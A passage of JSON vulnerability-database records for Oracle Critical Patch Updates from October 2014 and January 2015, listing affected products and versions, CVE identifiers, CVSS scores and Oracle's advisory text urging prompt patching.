"le"}, {"name": "Oracle Telecommunications Billing Integrator", "version": "12.0.4", "operator": "le"}, {"name": "Oracle Web Applications Desktop Integrator", "version": "12.2.3", "operator": "le"}, {"name": "MICROS Retail", "version": "4.5.1", "operator": "le"}, {"name": "Oracle Agile PLM", "version": "9.3.3", "operator": "le"}, {"name": "Oracle Customer Intelligence", "version": "12.2.2", "operator": "le"}, {"name": "Oracle Communications Diameter Signaling Router", "version": "5.0", "operator": "le"}, {"name": "Oracle WebLogic Server", "version": "12.1.1.0", "operator": "le"}, {"name": "Java SE", "version": "7u72", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.3", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "4.0.26", "operator": "le"}, {"name": "Oracle Reports Developer", "version": "11.1.2.2", "operator": "le"}, {"name": "Siebel Core - Server Infrastructure", "version": "8.2.2", "operator": "le"}, {"name": "MICROS Retail", "version": "3.2.1", "operator": "le"}, {"name": "Oracle Communications Messaging Server", "version": "7.0.5.33.0", "operator": "le"}, {"name": "PL/SQL", "version": "11.2.0.3", "operator": "le"}, {"name": "Oracle iLearning", "version": "6.0", "operator": "le"}, {"name": "Oracle RDBMS", "version": "11.2.0.4", "operator": "le"}, {"name": "Siebel Life Sciences", "version": "8.1.1", "operator": "le"}, {"name": "SPARC Enterprise M3000, M4000, M5000, M8000, M9000 Servers", "version": "1119", "operator": "le"}, {"name": "Oracle Marketing", "version": "12.1.2", "operator": "le"}, {"name": "Siebel UI Framework", "version": "8.1.1", "operator": "le"}, {"name": "OJVM", "version": "12.1.0.1", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "4.3.14", "operator": "le"}, {"name": "Oracle Customer Intelligence", "version": "12.1.2", "operator": "le"}, {"name": "MICROS Retail", "version": "6.5.2", "operator": "le"}, {"name": "PL/SQL", "version": "11.1.0.7", "operator": "le"}, {"name": "Oracle WebLogic Server", "version": "12.1.2.0", "operator": "le"}, {"name": "Oracle Customer Interaction History", "version": "12.0.4", "operator": "le"}, {"name": "Oracle Adaptive Access Manager", "version": "11.1.2.1", "operator": "le"}, {"name": "Oracle Customer Intelligence", "version": "12.0.4", "operator": "le"}, {"name": "Workspace Manager", "version": "11.2.0.3", "operator": "le"}, {"name": "Oracle Access Manager", "version": "11.1.1.5", "operator": "le"}, {"name": "MySQL Server", "version": "5.5.40", "operator": "le"}, {"name": "PeopleSoft Enterprise PeopleTools", "version": "8.53", "operator": "le"}, {"name": "Java SE, Java SE Embedded, JRockit", "version": "8u6", "operator": "le"}, {"name": "Siebel Life Sciences", "version": "8.2.2", "operator": "le"}, {"name": "Integrated Lights Out Manager(ILOM)", "version": "3.2.4", "operator": "le"}, {"name": "Oracle WebLogic Server", "version": "10.0.2.0", "operator": "le"}, {"name": "Oracle WebLogic Portal", "version": "10.0.1.0", "operator": "le"}, {"name": "Oracle Directory Server Enterprise Edition", "version": "7.0", "operator": "le"}, {"name": "Enterprise Manager Ops Center", "version": "11.1.3", "operator": "le"}, {"name": "MySQL Server", "version": "5.6.19", "operator": "le"}, {"name": "BI Publisher (formerly XML Publisher)", "version": "11.1.1.7", "operator": "le"}, {"name": "Oracle Applications Framework", "version": "12.2.2", "operator": "le"}, {"name": "Oracle WebLogic Server", "version": "10.3.6.0", "operator": "le"}, {"name": "Oracle Applications DBA", "version": "11.5.10.2", "operator": "le"}, {"name": "Oracle GlassFish Server", "version": "3.0.1", "operator": "le"}, {"name": "Fujitsu M10-1, M10-4, M10-4S Servers", "version": "2232", "operator": "le"}, {"name": "Oracle Secure Global Desktop", "version": "5.0", "operator": "le"}, {"name": "Oracle HCM Configuration Workbench", "version": "11.5.10.2", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "4.1.36", "operator": "le"}, {"name": "PeopleSoft Enterprise PeopleTools", "version": "8.52", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.1", "operator": "le"}, {"name": "Oracle Communications Diameter Signaling Router", "version": "3.x", "operator": "le"}, {"name": "Siebel Core - Server Infrastructure", "version": "8.1.1", "operator": "le"}, {"name": "Siebel Core - EAI", "version": "8.2.2", "operator": "le"}, {"name": "Oracle Agile PLM for Process", "version": "6.1.0.3", "operator": "le"}, {"name": "Oracle HCM Configuration Workbench", "version": "12.0.6", "operator": "le"}, {"name": "Oracle Application Object Library", "version": "12.1.3", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.0", "operator": "le"}, {"name": "Oracle Security Service", "version": "12.1.3", "operator": "le"}, {"name": "Oracle Telecommunications Billing Integrator", "version": "12.2.3", "operator": "le"}, {"name": "Oracle Telecommunications Billing Integrator", "version": "12.1.2", "operator": "le"}, {"name": "MySQL Server", "version": "5.6.21", "operator": "le"}, {"name": "Oracle HCM Configuration Workbench", "version": "12.2.2", "operator": "le"}, {"name": "Solaris Cluster", "version": "3.3", "operator": "le"}, {"name": "Oracle Customer Interaction History", "version": "12.1.1", "operator": "le"}, {"name": "Oracle Applications Framework", "version": "11.5.10.2", "operator": "le"}, {"name": "Oracle Telecommunications Billing Integrator", "version": "12.2.4", "operator": "le"}, {"name": "Oracle Telecommunications Billing Integrator", "version": "12.0.5", "operator": "le"}, {"name": "Oracle Web Applications Desktop Integrator", "version": "11.5.10.2", "operator": "le"}, {"name": "Oracle Directory Server Enterprise Edition", "version": "11.1.1.7", "operator": "le"}, {"name": "Oracle Access Manager", "version": "11.1.1.7", "operator": "le"}, {"name": "Oracle HCM Configuration Workbench", "version": "12.0.4", "operator": "le"}, {"name": "PL/SQL", "version": "11.2.0.4", "operator": "le"}, {"name": "Oracle HTTP Server", "version": "12.1.3.0", "operator": "le"}, {"name": "Oracle Security Service", "version": "12.1.2", "operator": "le"}, {"name": "Recovery", "version": "11.1.0.7", "operator": "le"}, {"name": "Oracle Customer Interaction History", "version": "12.1.2", "operator": "le"}, {"name": "Oracle Applications DBA", "version": "12.1.3", "operator": "le"}, {"name": "Oracle Applications DBA", "version": "12.0.6", "operator": "le"}, {"name": "Oracle Healthcare Master Person Index", "version": "2.x", "operator": "le"}, {"name": "Oracle Marketing", "version": "12.0.5", "operator": "le"}, {"name": "Oracle WebLogic Portal", "version": "10.2.1.0", "operator": "le"}, {"name": "Siebel Core - Server BizLogic Script", "version": "8.2.2", "operator": "le"}, {"name": "PL/SQL", "version": "12.1.0.1", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "3.2.24", "operator": "le"}, {"name": "Solaris Cluster", "version": "4.1", "operator": "le"}, {"name": "Siebel Core - EAI", "version": "8.1.1", "operator": "le"}, {"name": "Siebel Core EAI", "version": "8.1.1", "operator": "le"}, {"name": "MICROS Retail", "version": "4.0.1", "operator": "le"}, {"name": "Oracle Customer Intelligence", "version": "12.1.1", "operator": "le"}, {"name": "MICROS Retail", "version": "5.0.3", "operator": "le"}, {"name": "Oracle Exalogic Infrastructure", "version": "2.0.6.2.0", "operator": "le"}, {"name": "XML Developer's Kit for C", "version": "11.2.0.3", "operator": "le"}, {"name": "JD Edwards EnterpriseOne Tools", "version": "9.1.5", "operator": "le"}, {"name": "Oracle Applications Framework", "version": "12.2.4", "operator": "le"}, {"name": "Oracle RDBMS", "version": "11.2.0.3", "operator": "le"}, {"name": "Siebel Core - System Management", "version": "8.1.1", "operator": "le"}, {"name": "Siebel Core - Server OM Services", "version": "8.1.1", "operator": "le"}, {"name": "Oracle GlassFish Server", "version": "3.1.2", "operator": "le"}, {"name": "Enterprise Manager Ops Center", "version": "12.2", "operator": "le"}, {"name": "Oracle Web Applications Desktop Integrator", "version": "12.0.6", "operator": "le"}, {"name": "Oracle WebLogic Portal", "version": "10.3.6.0", "operator": "le"}, {"name": "MICROS Retail", "version": "4.8.0", "operator": "le"}, {"name": "Oracle Secure Global Desktop", "version": "4.71", "operator": "le"}, {"name": "Recovery", "version": "11.2.0.3", "operator": "le"}, {"name": "Oracle Waveset", "version": "8.1.1", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.2", "operator": "le"}], "cvelist": ["CVE-2015-0388", "CVE-2014-6574", "CVE-2015-0390", "CVE-2011-4317", "CVE-2014-6592", "CVE-2014-3566", "CVE-2011-4461", "CVE-2015-0386", "CVE-2015-0425", "CVE-2014-6566", "CVE-2013-4784", "CVE-2014-0191", "CVE-2015-0365", "CVE-2014-6579", "CVE-2014-6556", "CVE-2014-0231", "CVE-2014-6571", "CVE-2015-0427", "CVE-2014-6578", "CVE-2015-0398", "CVE-2014-6510", "CVE-2014-6595", "CVE-2011-3607", "CVE-2014-6518", "CVE-2015-0385", "CVE-2015-0395", "CVE-2015-0368", "CVE-2013-6449", "CVE-2014-6575", "CVE-2015-0380", "CVE-2015-0424", "CVE-2003-0001", "CVE-2014-6565", "CVE-2015-0407", "CVE-2014-0076", "CVE-2015-0362", "CVE-2015-0430", "CVE-2014-6585", "CVE-2015-0410", "CVE-2013-5704", "CVE-2015-0402", "CVE-2015-0379", "CVE-2014-6548", "CVE-2015-0396", "CVE-2015-0422", "CVE-2015-0435", "CVE-2014-5704", "CVE-2013-5605", "CVE-2014-6584", "CVE-2014-0224", "CVE-2014-4259", "CVE-2015-0391", "CVE-2014-6567", "CVE-2015-0418", "CVE-2013-0338", "CVE-2014-6480", "CVE-2014-6576", "CVE-2015-0428", "CVE-2015-0431", "CVE-2014-0098", "CVE-2014-6549", "CVE-2015-0420", "CVE-2015-0432", "CVE-2015-0383", "CVE-2011-3389", "CVE-2013-1741", "CVE-2014-6583", "CVE-2014-6597", "CVE-2014-4279", "CVE-2004-0230", "CVE-2015-0369", "CVE-2014-6525", "CVE-2015-0372", "CVE-2014-6582", "CVE-2015-0378", "CVE-2015-0392", "CVE-2015-0416", "CVE-2014-6587", "CVE-2013-1740", "CVE-2013-6438", "CVE-2015-0406", "CVE-2015-0401", "CVE-2014-6569", "CVE-2014-3470", "CVE-2012-0053", "CVE-2013-1739", "CVE-2014-6599", "CVE-2014-1492", "CVE-2013-2877", "CVE-2015-0417", "CVE-2015-0404", "CVE-2013-6450", "CVE-2013-5606", "CVE-2014-0114", "CVE-2015-0364", "CVE-2014-0050", "CVE-2010-5107", "CVE-2011-3368", "CVE-2014-6573", "CVE-2014-1490", "CVE-2010-5298", "CVE-2013-4286", "CVE-2015-0371", "CVE-2014-6526", "CVE-2015-0382", "CVE-2014-1568", "CVE-2015-0363", "CVE-2014-6600", "CVE-2014-6580", "CVE-2014-6509", "CVE-2015-0375", "CVE-2015-0414", "CVE-2014-0195", "CVE-2015-0413", "CVE-2014-6593", "CVE-2014-0198", "CVE-2014-6601", "CVE-2014-6594", "CVE-2015-0373", "CVE-2015-0421", "CVE-2013-2186", "CVE-2014-3567", "CVE-2014-6581", "CVE-2014-0015", "CVE-2015-0403", "CVE-2014-6570", "CVE-2015-0408", "CVE-2015-0429", "CVE-2014-6596", "CVE-2014-6521", "CVE-2015-0374", "CVE-2014-6591", "CVE-2014-6586", "CVE-2014-6524", "CVE-2014-6572", "CVE-2015-0370", "CVE-2015-0412", "CVE-2015-0400", "CVE-2015-0409", "CVE-2015-0387", "CVE-2015-0389", "CVE-2015-0399", "CVE-2014-0118", "CVE-2015-0415", "CVE-2014-6590", "CVE-2015-0376", "CVE-2014-6481", "CVE-2015-0393", "CVE-2015-0366", "CVE-2015-0419", "CVE-2014-6568", "CVE-2015-0377", "CVE-2015-0394", "CVE-2015-0397", "CVE-2015-0384", "CVE-2014-6589", "CVE-2014-1491", "CVE-2014-6528", "CVE-2014-6588", "CVE-2014-6541", "CVE-2011-1944", "CVE-2015-0437", "CVE-2014-6514", "CVE-2014-0117", "CVE-2014-4212", "CVE-2015-0436", "CVE-2014-6598", "CVE-2015-0367", "CVE-2014-0226", "CVE-2013-1620", "CVE-2013-4545", "CVE-2015-0426", "CVE-2015-0434", "CVE-2014-0221", "CVE-2015-0411", "CVE-2015-0381", "CVE-2014-6577"], "modified": "2015-01-20T00:00:00", "id": "ORACLE:CPUJAN2015-1972971", "href": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T04:14:04", "references": [], "description": "A Critical Patch Update (CPU) is a collection of patches for multiple security vulnerabilities. Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security fixes. Please refer to:\n\n[Critical Patch Updates and Security Alerts](<http://www.oracle.com/technetwork/topics/security/alerts-086861.html>) for information about Oracle Security Advisories.\n\n**Oracle has received specific reports of malicious exploitation of vulnerabilities for which Oracle has already released fixes. In some instances, it has been reported that malicious attackers have been successful because customers had failed to apply these Oracle patches. Oracle therefore _strongly_ recommends that customers remain on actively-supported versions and apply Critical Patch Update fixes _without_ delay.**\n\nOracle acknowledges Dana Taylor of netinfiltration.com for bringing to Oracle's attention a number of sites that were vulnerable to disclosure of sensitive information because Oracle CPU fixes were not applied to those sites for more than a year.\n\nThis Critical Patch Update contains 154 new security fixes across the product families listed below. Please note that a blog entry summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at <https://blogs.oracle.com/security>.\n\nPlease note that on September 26, 2014, Oracle released a [Security Alert for CVE-2014-7169 \"Bash\"](<http://www.oracle.com/technetwork/topics/security/alert-cve-2014-7169-2303276.html>) and other publicly disclosed vulnerabilities affecting GNU Bash. Customers of affected Oracle products are strongly advised to apply the fixes that were announced in the Security Alert for CVE-2014-7169.\n\nThis Critical Patch Update advisory is also available in an XML format that conforms to the Common Vulnerability Reporting Format (CVRF) version 1.1. More information about Oracle's use of CVRF is available at: <http://www.oracle.com/technetwork/topics/security/cpufaq-098434.html#CVRF>.\n", "edition": 3, "reporter": "Oracle", "published": "2014-10-14T00:00:00", "title": "Oracle Critical Patch Update - October 2014", "type": "oracle", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Oracle Access Manager", "version": "11.1.2.1", "operator": "le"}, {"name": "Java SE, Java SE Embedded", "version": "8u20", "operator": "le"}, {"name": "Oracle Communications MetaSolv Solution", "version": "9.4.0", "operator": "le"}, {"name": "Oracle Adaptive Access Manager", "version": "11.1.1.7", "operator": "le"}, {"name": "Primavera Contract Management", "version": "13.1", "operator": "le"}, {"name": "Oracle Retail Allocation", "version": "13.1", "operator": "le"}, {"name": "Oracle Payments", "version": "12.2.4", "operator": "le"}, {"name": "JPublisher", "version": "12.1.0.2", "operator": "le"}, {"name": "JDBC", "version": "12.1.0.1", "operator": "le"}, {"name": "Java SE, JavaFX", "version": "2.2.65", "operator": "le"}, {"name": "SQLJ", "version": "11.2.0.4", "operator": "le"}, {"name": "Oracle OpenSSO", "version": "3.0", "operator": "le"}, {"name": "Oracle Secure Global Desktop", "version": "5.1", "operator": "le"}, {"name": "Java VM", "version": "11.2.0.3", "operator": "le"}, {"name": "Oracle Endeca Information Discovery Studio", "version": "2.3", "operator": "le"}, {"name": "Java VM", "version": "11.2.0.4", "operator": "le"}, {"name": "Java VM", "version": "11.1.0.7", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.4", "operator": "le"}, {"name": "Oracle Endeca Information Discovery Studio", "version": "2.4", "operator": "le"}, {"name": "Oracle RDBMS", "version": "11.1.0.7", "operator": "le"}, {"name": "Java SE, Java SE Embedded", "version": "6u81", "operator": "le"}, {"name": "Fujitsu M10-1, Fujitsu M10-4, Fujitsu M10-4S servers", "version": "2221", "operator": "le"}, {"name": "Oracle Retail Markdown Optimization", "version": "13.1", "operator": "le"}, {"name": "Java SE, Java SE Embedded", "version": "7u60", "operator": "le"}, {"name": "Oracle Applications Manager", "version": "12.2.4", "operator": "le"}, {"name": "Oracle Retail Markdown Optimization", "version": "13.2", "operator": "le"}, {"name": "Oracle Retail Allocation", "version": "13.2", "operator": "le"}, {"name": "MySQL Server", "version": "5.5.39", "operator": "le"}, {"name": "MySQL Server", "version": "5.6.20", "operator": "le"}, {"name": "PeopleSoft Enterprise HRMS", "version": "9.2", "operator": "le"}, {"name": "Oracle Identity Manager", "version": "11.1.1.7", "operator": "le"}, {"name": "Enterprise Manager for Oracle Database", "version": "11.1.0.1", "operator": "le"}, {"name": "JDBC", "version": "11.2.0.4", "operator": "le"}, {"name": "Oracle Retail Clearance Optimization Engine", "version": "13.3", "operator": "le"}, {"name": "Java SE, Java SE Embedded", "version": "5.0u71", "operator": "le"}, {"name": "Oracle Adaptive Access Manager", "version": "11.1.1.5", "operator": "le"}, {"name": "Oracle Retail Invoice Matching", "version": "13.1", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.2", "operator": "le"}, {"name": "Oracle Applications Manager", "version": "12.2.2", "operator": "le"}, {"name": "JPublisher", "version": "11.2.0.4", "operator": "le"}, {"name": "Oracle Retail Allocation", "version": "12.0", "operator": "le"}, {"name": "Oracle Payments", "version": "12.0.4", "operator": "le"}, {"name": "Primavera P6 Enterprise Project Portfolio Management", "version": "8.3", "operator": "le"}, {"name": "Oracle Payments", "version": "12.1.2", "operator": "le"}, {"name": "Enterprise Manager for Oracle Database", "version": "12.1.0.6", "operator": "le"}, {"name": "Oracle Applications Technology Stack", "version": "12.0.6", "operator": "le"}, {"name": "Oracle Identity Manager", "version": "11.1.2.1", "operator": "le"}, {"name": "Oracle Applications Manager", "version": "12.0.6", "operator": "le"}, {"name": "Primavera Contract Management", "version": "14.0", "operator": "le"}, {"name": "Oracle Retail Allocation", "version": "10.0", "operator": "le"}, {"name": "Solaris", "version": "11", "operator": "le"}, {"name": "Oracle Secure Global Desktop", "version": "4.63", "operator": "le"}, {"name": "SQLJ", "version": "11.1.0.7", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "4.1.34", "operator": "le"}, {"name": "Oracle Applications Framework", "version": "12.1.3", "operator": "le"}, {"name": "JPublisher", "version": "11.2.0.3", "operator": "le"}, {"name": "Oracle Endeca Information Discovery Studio", "version": "3.0", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.1", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.5", "operator": "le"}, {"name": "Java SE, Java SE Embedded, JRockit", "version": "8u20", "operator": "le"}, {"name": "Oracle WebLogic Server", "version": "12.1.3.0", "operator": "le"}, {"name": "JDBC", "version": "11.2.0.3", "operator": "le"}, {"name": "Java SE", "version": "5.0u71", "operator": "le"}, {"name": "Oracle Payments", "version": "12.0.6", "operator": "le"}, {"name": "Oracle Retail Invoice Matching", "version": "12.0", "operator": "le"}, {"name": "PeopleSoft Enterprise PeopleTools", "version": "8.54", "operator": "le"}, {"name": "Oracle Retail Clearance Optimization Engine", "version": "13.4", "operator": "le"}, {"name": "Oracle Access Manager", "version": "11.1.2.2", "operator": "le"}, {"name": "Oracle Applications Technology", "version": "12.0.6", "operator": "le"}, {"name": "Oracle Retail Invoice Matching", "version": "13.2", "operator": "le"}, {"name": "Java SE, Java SE Embedded, JRockit", "version": "5.0u71", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3", "operator": "le"}, {"name": "Oracle Applications Technology", "version": "12.1.3", "operator": "le"}, {"name": "Java VM", "version": "12.1.0.2", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "4.2.26", "operator": "le"}, {"name": "Oracle Retail Markdown Optimization", "version": "13.0", "operator": "le"}, {"name": "Oracle Endeca Information Discovery Studio", "version": "2.2.2", "operator": "le"}, {"name": "Oracle Retail Clearance Optimization Engine", "version": "14.0", "operator": "le"}, {"name": "Oracle Applications Technology Stack", "version": "12.2.3", "operator": "le"}, {"name": "Oracle RDBMS", "version": "12.1.0.1", "operator": "le"}, {"name": "Oracle Applications Manager", "version": "12.1.3", "operator": "le"}, {"name": "Enterprise Manager for Oracle Database", "version": "12.1.0.5", "operator": "le"}, {"name": "Solaris", "version": "10", "operator": "le"}, {"name": "SQLJ", "version": "12.1.0.1", "operator": "le"}, {"name": "Oracle Applications Technology Stack", "version": "12.1.3", "operator": "le"}, {"name": "Oracle Retail Invoice Matching", "version": "11.0", "operator": "le"}, {"name": "Oracle Applications Technology", "version": "11.5.10.2", "operator": "le"}, {"name": "Oracle Applications Technology Stack", "version": "12.2.4", "operator": "le"}, {"name": "Oracle Applications Framework", "version": "12.0.6", "operator": "le"}, {"name": "MySQL Server", "version": "5.5.38", "operator": "le"}, {"name": "Oracle Enterprise Data Quality", "version": "9.0.11", "operator": "le"}, {"name": "Oracle Payments", "version": "12.2.2", "operator": "le"}, {"name": "Oracle Adaptive Access Manager", "version": "11.1.2.2", "operator": "le"}, {"name": "Oracle Applications Framework", "version": "12.2.3", "operator": "le"}, {"name": "Oracle Payments", "version": "12.1.3", "operator": "le"}, {"name": "Java SE", "version": "8u20", "operator": "le"}, {"name": "Oracle Communications MetaSolv Solution", "version": "49.0.0", "operator": "le"}, {"name": "Oracle Payments", "version": "12.1.1", "operator": "le"}, {"name": "Java SE, Java SE Embedded, JRockit", "version": "27.8.3", "operator": "le"}, {"name": "Primavera P6 Enterprise Project Portfolio Management", "version": "8.2", "operator": "le"}, {"name": "Java SE, Java SE Embedded, JRockit", "version": "6u81", "operator": "le"}, {"name": "Java SE, Java SE Embedded, JRockit", "version": "7u67", "operator": "le"}, {"name": "Oracle Retail Allocation", "version": "11.0", "operator": "le"}, {"name": "JDBC", "version": "11.1.0.7", "operator": "le"}, {"name": "Oracle Health Sciences Empirica Signal", "version": "7.3.3.3", "operator": "le"}, {"name": "Oracle JDeveloper", "version": "11.1.1.7", "operator": "le"}, {"name": "Oracle WebLogic Server", "version": "12.1.1.0", "operator": "le"}, {"name": "Oracle Applications Object Library", "version": "11.5.10.2", "operator": "le"}, {"name": "PeopleSoft Enterprise PT PeopleTools", "version": "8.53", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.3", "operator": "le"}, {"name": "SQLJ", "version": "12.1.0.2", "operator": "le"}, {"name": "Java SE, Java SE Embedded, JRockit", "version": "7u60", "operator": "le"}, {"name": "Oracle RDBMS", "version": "11.2.0.4", "operator": "le"}, {"name": "Oracle JDeveloper", "version": "12.1.2.0", "operator": "le"}, {"name": "Oracle Retail Invoice Matching", "version": "12.1", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "4.3.14", "operator": "le"}, {"name": "JPublisher", "version": "11.1.0.7", "operator": "le"}, {"name": "Oracle JDeveloper", "version": "11.1.2.4", "operator": "le"}, {"name": "Java SE, JavaFX", "version": "8u20", "operator": "le"}, {"name": "Oracle WebLogic Server", "version": "12.1.2.0", "operator": "le"}, {"name": "Oracle Adaptive Access Manager", "version": "11.1.2.1", "operator": "le"}, {"name": "Primavera P6 Enterprise Project Portfolio Management", "version": "7.0", "operator": "le"}, {"name": "Oracle Access Manager", "version": "11.1.1.5", "operator": "le"}, {"name": "PeopleSoft Enterprise PeopleTools", "version": "8.53", "operator": "le"}, {"name": "Java SE, Java SE Embedded, JRockit", "version": "28.3.3", "operator": "le"}, {"name": "Oracle WebLogic Server", "version": "10.0.2.0", "operator": "le"}, {"name": "Oracle Retail Allocation", "version": "13.0", "operator": "le"}, {"name": "Oracle Retail Markdown Optimization", "version": "13.4", "operator": "le"}, {"name": "Oracle Applications Manager", "version": "12.2.3", "operator": "le"}, {"name": "MySQL Server", "version": "5.6.19", "operator": "le"}, {"name": "Oracle JDeveloper", "version": "12.1.3.0", "operator": "le"}, {"name": "Oracle Applications Framework", "version": "12.2.2", "operator": "le"}, {"name": "PeopleSoft Enterprise PT PeopleTools", "version": "8.54", "operator": "le"}, {"name": "Enterprise Manager for Oracle Database", "version": "11.2.0.3", "operator": "le"}, {"name": "Primavera P6 Enterprise Project Portfolio Management", "version": "8.1", "operator": "le"}, {"name": "Oracle WebLogic Server", "version": "10.3.6.0", "operator": "le"}, {"name": "Oracle Retail Invoice Matching", "version": "13.0", "operator": "le"}, {"name": "Oracle Secure Global Desktop", "version": "5.0", "operator": "le"}, {"name": "PeopleSoft Enterprise PeopleTools", "version": "8.52", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.1", "operator": "le"}, {"name": "Agile PLM", "version": "9.3.3", "operator": "le"}, {"name": "Enterprise Manager for Oracle Database", "version": "10.2.0.5", "operator": "le"}, {"name": "Oracle Endeca Information Discovery Studio", "version": "3.1", "operator": "le"}, {"name": "Oracle Applications Framework", "version": "11.5.10.2", "operator": "le"}, {"name": "Oracle Payments", "version": "12.2.3", "operator": "le"}, {"name": "Oracle Communications MetaSolv Solution", "version": "6.2.1.0.0", "operator": "le"}, {"name": "Java SE, Java SE Embedded", "version": "7u67", "operator": "le"}, {"name": "Enterprise Manager for Oracle Database", "version": "11.2.0.4", "operator": "le"}, {"name": "Oracle JDeveloper", "version": "10.1.3.5", "operator": "le"}, {"name": "Oracle Access Manager", "version": "11.1.1.7", "operator": "le"}, {"name": "Application Performance Management", "version": "12.1.0.6.2", "operator": "le"}, {"name": "Oracle Applications Technology Stack", "version": "12.2.2", "operator": "le"}, {"name": "Java SE", "version": "6u81", "operator": "le"}, {"name": "Java SE", "version": "7u67", "operator": "le"}, {"name": "Oracle Retail Invoice Matching", "version": "14.0", "operator": "le"}, {"name": "Oracle Health Sciences Empirica Inspections", "version": "1.0.1.0", "operator": "le"}, {"name": "Oracle Communications MetaSolv Solution", "version": "10.1.0", "operator": "le"}, {"name": "Oracle Retail Markdown Optimization", "version": "12.0", "operator": "le"}, {"name": "Java VM", "version": "12.1.0.1", "operator": "le"}, {"name": "Oracle Enterprise Data Quality", "version": "8.1.2", "operator": "le"}, {"name": "Primavera P6 Enterprise Project Portfolio Management", "version": "8.0", "operator": "le"}, {"name": "SQLJ", "version": "11.2.0.3", "operator": "le"}, {"name": "Oracle Health Sciences Empirica Study", "version": "3.1.2.0", "operator": "le"}, {"name": "JD Edwards EnterpriseOne Tools", "version": "8.98", "operator": "le"}, {"name": "Oracle Applications Framework", "version": "12.2.4", "operator": "le"}, {"name": "Agile PLM", "version": "9.3.1.2", "operator": "le"}, {"name": "Oracle RDBMS", "version": "11.2.0.3", "operator": "le"}, {"name": "Oracle Communications Session Border Controller", "version": "640m5", "operator": "le"}, {"name": "JPublisher", "version": "12.1.0.1", "operator": "le"}, {"name": "Oracle Application Express", "version": "4.2.6", "operator": "le"}, {"name": "Oracle Identity Manager", "version": "11.1.2.2", "operator": "le"}, {"name": "Oracle Secure Global Desktop", "version": "4.71", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.2", "operator": "le"}, {"name": "Oracle Identity Manager", "version": "11.1.1.5", "operator": "le"}], "cvelist": ["CVE-2014-6495", "CVE-2014-6506", "CVE-2014-6500", "CVE-2014-2478", "CVE-2014-6564", "CVE-2014-6482", "CVE-2014-6536", "CVE-2014-6544", "CVE-2014-6558", "CVE-2014-6516", "CVE-2014-6560", "CVE-2014-6530", "CVE-2014-6505", "CVE-2014-4301", "CVE-2014-6463", "CVE-2014-6515", "CVE-2014-6460", "CVE-2014-6554", "CVE-2014-6539", "CVE-2014-4292", "CVE-2014-6487", "CVE-2014-6538", "CVE-2014-6493", "CVE-2014-4280", "CVE-2014-6488", "CVE-2014-4282", "CVE-2014-6519", "CVE-2014-2472", "CVE-2014-6466", "CVE-2014-6517", "CVE-2014-6471", "CVE-2014-6501", "CVE-2014-6504", "CVE-2014-6534", "CVE-2014-6455", "CVE-2014-6459", "CVE-2014-6502", "CVE-2014-7169", "CVE-2013-5605", "CVE-2014-6472", "CVE-2014-0224", "CVE-2014-6492", "CVE-2014-6457", "CVE-2014-4284", "CVE-2014-6484", "CVE-2014-6476", "CVE-2014-6479", "CVE-2014-6535", "CVE-2014-6507", "CVE-2014-6503", "CVE-2014-6490", "CVE-2014-6557", "CVE-2014-6542", "CVE-2014-6454", "CVE-2014-4295", "CVE-2014-4291", "CVE-2014-6469", "CVE-2014-4278", "CVE-2014-6537", "CVE-2014-6486", "CVE-2014-6496", "CVE-2013-1741", "CVE-2014-6555", "CVE-2014-2476", "CVE-2014-6529", "CVE-2014-6562", "CVE-2013-1740", "CVE-2014-4293", "CVE-2014-6511", "CVE-2014-3470", "CVE-2013-1739", "CVE-2014-6475", "CVE-2014-6485", "CVE-2014-6559", "CVE-2014-6470", "CVE-2014-4274", "CVE-2014-4294", "CVE-2014-6531", "CVE-2014-0119", "CVE-2014-1492", "CVE-2014-6456", "CVE-2014-6547", "CVE-2014-2880", "CVE-2013-5606", "CVE-2014-0114", "CVE-2014-4310", "CVE-2014-6543", "CVE-2014-6464", "CVE-2014-6468", "CVE-2014-4297", "CVE-2013-4322", "CVE-2014-0050", "CVE-2014-6520", "CVE-2014-6551", "CVE-2014-1490", "CVE-2010-5298", "CVE-2013-4286", "CVE-2014-6458", "CVE-2014-6532", "CVE-2014-6533", "CVE-2014-4276", "CVE-2014-4277", "CVE-2014-4288", "CVE-2014-6550", "CVE-2014-0195", "CVE-2014-4296", "CVE-2014-0198", "CVE-2013-4590", "CVE-2014-4290", "CVE-2014-6478", "CVE-2014-6553", "CVE-2014-6483", "CVE-2014-6473", "CVE-2014-0096", "CVE-2014-2475", "CVE-2014-4300", "CVE-2014-0075", "CVE-2014-6546", "CVE-2014-6465", "CVE-2014-4299", "CVE-2014-6491", "CVE-2014-6508", "CVE-2014-4289", "CVE-2014-6453", "CVE-2014-2473", "CVE-2014-4285", "CVE-2014-6522", "CVE-2014-0033", "CVE-2012-5615", "CVE-2014-6467", "CVE-2014-6523", "CVE-2014-6452", "CVE-2014-0095", "CVE-2014-6513", "CVE-2014-6474", "CVE-2014-1491", "CVE-2014-6489", "CVE-2014-2474", "CVE-2014-6563", "CVE-2014-6545", "CVE-2014-4281", "CVE-2014-4275", "CVE-2014-4287", "CVE-2014-6477", "CVE-2014-6552", "CVE-2014-6540", 